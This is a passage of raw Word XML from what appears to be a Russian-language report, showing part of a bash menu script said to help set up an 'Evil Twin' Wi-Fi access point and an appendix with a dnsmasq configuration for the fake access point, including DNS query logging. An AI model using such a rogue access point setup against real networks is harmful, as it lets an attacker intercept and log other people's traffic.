          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D785313"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case $userInput in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C17FCF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0) option</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5039E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1) option</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAA9F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2) option</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E7280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3) option</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF81A7F"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4) option</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D2E3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r>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>5) option</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D82B0AD"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esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C09544"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B494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echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A771D3"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 xml:space="preserve">echo "You MUST set your usb Wifi adapter in monitor mode </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C6929C"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echo "Then follow the steps 1-5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F30DD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 xml:space="preserve">echo "This will help set up an Evil Twin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0465C5AC"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echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D1A8B"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echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D03624"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echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB9CF4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sleep 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5251CC94"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uI=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27223849"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interface=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D61F49"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while [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interface ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7B1A65"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option0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B07D97"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lastRenderedPageBreak/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCEEF16"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p>
    <w:p w14:paraId="46B6E1C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 xml:space="preserve">until [ $uI = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5 ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FF7CE1"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menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1466C6CA"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uI=$userInput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E50162" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">#echo "you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>selected  $</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uI  hello"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72E9CF" w14:textId="77777777" w:rsidR="00CB3331"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>userAction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80A8E7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="1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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC85C1" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D03FCCD" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_heading=h.1t3h5sf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="17" w:name="_Toc75213391"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7D062D72" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="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Конфигурация dnsmasq для ложной точки доступа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710A5A9C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interface=at0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3542F79A" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dhcp-range=10.0.0.20,10.0.0.250,255.255.255.0,12h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65219C32" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dhcp-option=3,10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55720E6B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dhcp-option=6,10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139FFA10" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server=8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B48ED75" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server=8.8.4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CAA3CE" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server=64.6.64.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FAEAE0" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server=64.6.65.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1199CB" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log-queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A45FBDA" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log-dhcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DBC4D1" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>listen-address=127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33602A58" w14:textId="48F65494" w:rsidR="009708B5" w:rsidRPr="000A3308" w:rsidRDefault="009708B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_heading=h.4d34og8" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:sectPr w:rsidR="009708B5" w:rsidRPr="000A3308" w:rsidSect="00C0341F">
      <w:footerReference w:type="default" r:id="rId27"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="0" w:footer="0" w:gutter="0"/>
